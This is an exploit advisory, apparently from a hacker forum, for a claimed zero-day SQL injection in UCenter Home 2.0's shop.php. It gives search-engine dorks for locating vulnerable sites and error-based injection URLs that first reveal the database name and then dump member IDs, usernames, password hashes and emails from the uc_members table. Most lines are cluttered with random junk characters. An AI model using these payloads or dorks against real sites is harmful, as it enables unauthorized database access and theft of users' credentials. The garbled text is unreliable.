4 q8 N3 y7 D+ p7 I% X5 v, j' T
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ " Y" h2 T+ c- Q" f/ g0 ^% t h5 ^! v R
1 U( m6 {# G& u% k: B
% j! B# P( R5 {
" {( Q |% I. c* F3 g" M*/ Author : KnocKout
% d) {" ?9 u$ x2 d4 F* O7 K8 y c1 n$ e
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 1 Z% z- i6 a1 ~; t/ s
- [5 [; s& G/ S*/ Contact: knockoutr@msn.com % t% A+ ^" N6 O; t5 M
/ s4 N- v; a& E( W( z6 Z" _7 x! J
*/ Cyber-Warrior.org/CWKnocKout * [3 {, _ p* h$ S% S% u6 t" ] a
& g7 d6 w$ t& E% H( v__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & w+ ~+ ^" X2 [" _
3 o# K# I2 K! C2 M' K4 Q% ?2 ZScript : UCenter Home 9 [5 L2 Q7 C X& j
+ q$ Y) i9 r; A7 J j7 IVersion : 2.0
$ s6 M' E/ }& P( e* R! F2 t
2 o/ Y7 n( S: U; o' k; ?5 t" [. uScript HomePage : http://u.discuz.net/ 0 @; X1 m1 t: H# N4 G4 y( R
$ t& l" _$ X/ c! e9 X$ h% q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 x9 b+ t5 I/ V! u$ K/ F' S1 |
) x" l7 T0 f3 H9 U! ^Dork : Powered by UCenter inurl:shop.php?ac=view
/ w3 N+ {; \0 m# r" _/ c; W) g1 d$ d n
Dork 2 : inurl:shop.php?ac=view&shopid=
+ }6 ?' T7 M; a `# \# o
4 l$ |" s; M" \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ J3 c2 K0 O @5 _; I$ s4 Z) Z9 T" c5 w. F! i, L: `
Vuln file : Shop.php & h. w( f- g" E- b1 I' l2 f/ z
6 c( K% I7 \! q9 ~8 Yvalue's : (?)ac=view&shopid=
' q# t/ V! v3 }: `. t$ Q4 m0 K, v
Vulnerable Style : SQL Injection (MySQL Error Based)
; D2 C4 _; {! H& m9 w+ U) d9 p: ~ X1 K. ]; x( i- g% f
Need Metarials : Hex Conversion
% S- N' R; G# A) A$ c
: }$ Y+ w) t1 O2 a" e6 b__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 o; T2 Z3 Z0 p$ ~2 g" Z% M, B$ c
' Q& |4 @3 e, r+ C- EYour Need victim Database name.
' o, d" l2 ^$ A. w6 ]2 ^1 i4 o+ `5 U! T+ `$ @( _9 G, ?: E
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 & R, g% d q' s# d, i2 r
/ [3 K5 F: s9 L! J; Z1 g/ Q9 c/ H S..
, d7 s1 N$ Y" I. f8 ^1 ~: d
7 V* A9 h4 j0 ]DB : Okey. ( q, V8 [ T- ^9 I- f! q! [4 c0 A/ O
9 _) J M: l" A) w* u4 Q2 j8 lyour edit DB `[TARGET DB NAME]` & S+ a) A s+ i
/ y* E0 ?7 B$ F
Example : 'hiwir1_ucenter' : k4 Y( \9 [; K; C% w
8 c# I, }* T# ^$ R- eEdit : Okey. # j7 @! H2 t" Q, b6 h+ ?, J+ E
+ v* J# |2 d0 `- G" M5 [3 UYour use Hex conversion. And edit Your SQL Injection Exploit.. " O9 K, P* o: H# n& c `" z2 a
9 _1 P# L) ]/ a
! V) d# c) L3 C' }6 C! l
( p' t4 G4 |3 v. X1 QExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + W* n, A3 P! ^/ L
|